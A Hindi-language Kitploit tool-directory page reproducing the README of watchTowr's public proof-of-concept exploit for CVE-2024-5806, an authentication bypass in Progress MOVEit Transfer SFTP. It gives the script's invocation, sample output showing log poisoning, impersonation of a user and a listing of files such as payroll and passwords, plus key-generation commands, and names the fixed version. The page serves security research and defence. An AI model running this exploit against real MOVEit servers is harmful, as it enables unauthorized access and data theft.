Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/watchtowrlabs/watchtowr-vs-progress-moveit_cve-2024-5806
Authentication & AuthorizationVulnerability AnalysisExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubwatchtowrlabs/watchtowr-vs-progress-moveit_cve-2024-5806

watchTowr-vs-progress-moveit_CVE-2024-5806

Exploit for the CVE-2024-5806

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4542 साल पहलेKitploit द्वारा समीक्षित

CVE-2024-5806

Progress MOVEit Transfer CVE-2024-5806 के लिए शोषण। हमारा ब्लॉग पोस्ट [TBD] पर देखें।

PoC कार्य में

सहायता के लिए --help देखें। एक विशिष्ट रन इस प्रकार दिखना चाहिए:

root@kitploit:~
> python CVE-2024-5806.py --target-ip 192.168.1.1 --target-user user2 --ppk id.ppk --pem id
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-2024-5806.py
        (*) Progress MoveIT Transfer SFTP Authentication Bypass (CVE-2024-5806)
          - Aliz Hammond, watchTowr ([email protected])
          - Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
        Note: We (watchTowr) aren't the original discoverers of the bug, we just reproduced it and wrote the exploit
              in order to enable proactive protection of client attack surfaces.
              We will update with proper credit when available.
        CVEs: [CVE-2024-5806]

(*) Poisoning log files multiple times to be sure...
..........OK
(*) Waiting 60 seconds for logs to be flushed to disk
(*) Attempting to authenticate..
(*) Trying to impersonate user2 using the server-side file path 'C:\MOVEitTransfer\Logs\DMZ_WEB.log'
(+) Authentication succeeded.
(+) Listing files in home directory of user user2:

-rw-rw-rw- 1 0 0 1.4M Jun 11 11:39 stocks.xlsx
-rw-rw-rw- 1 0 0 2.4M Jun 13 13:32 customer_list.xlsx
-rw-rw-rw- 1 0 0 2.3M Jun 15 12:16 payroll_Jun.csv
-rw-rw-rw- 1 0 0 1.2M Jan 21 10:03 my_signature.png
-rw-rw-rw- 1 0 0  304 Jun 17 17:29 passwords.txt

सेटअप

शोषण चलाने के लिए, आपको PEM और PPK दोनों प्रारूपों में एक कुंजी-जोड़ी की आवश्यकता होगी। Windows पर, आप इन फ़ाइलों को उत्पन्न करने के लिए puttygen का उपयोग कर सकते हैं। Linux पर, आप openssh और putty-tools पैकेज का उपयोग कर सकते हैं। कुंजी के लिए संकेत मिलने पर बस Enter दबाएँ।

root@kitploit:~
$ sudo apt-get install openssh-client putty-tools
$ puttygen -t rsa -b 2048 -o putty_key.ppk
Enter passphrase to save key:
Re-enter passphrase to verify:
$ puttygen putty_key.ppk -O private-openssh -o id_rsa

प्रभावित संस्करण

यह कमजोरी Progress MOVEit संस्करण 2024.0.2 में ठीक की गई है।

शोषण लेखक

यह शोषण watchTowr (@watchtowrcyber) के Aliz (@AlizTheHax0r) और Sina Kheirkhah (@SinSinology) द्वारा लिखा गया था।

watchTowr Labs को फॉलो करें

नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम को फॉलो करें

  • https://labs.watchtowr.com/
  • https://twitter.com/watchtowrcyber
  • [blog link TBD]
टूल डाउनलोड करें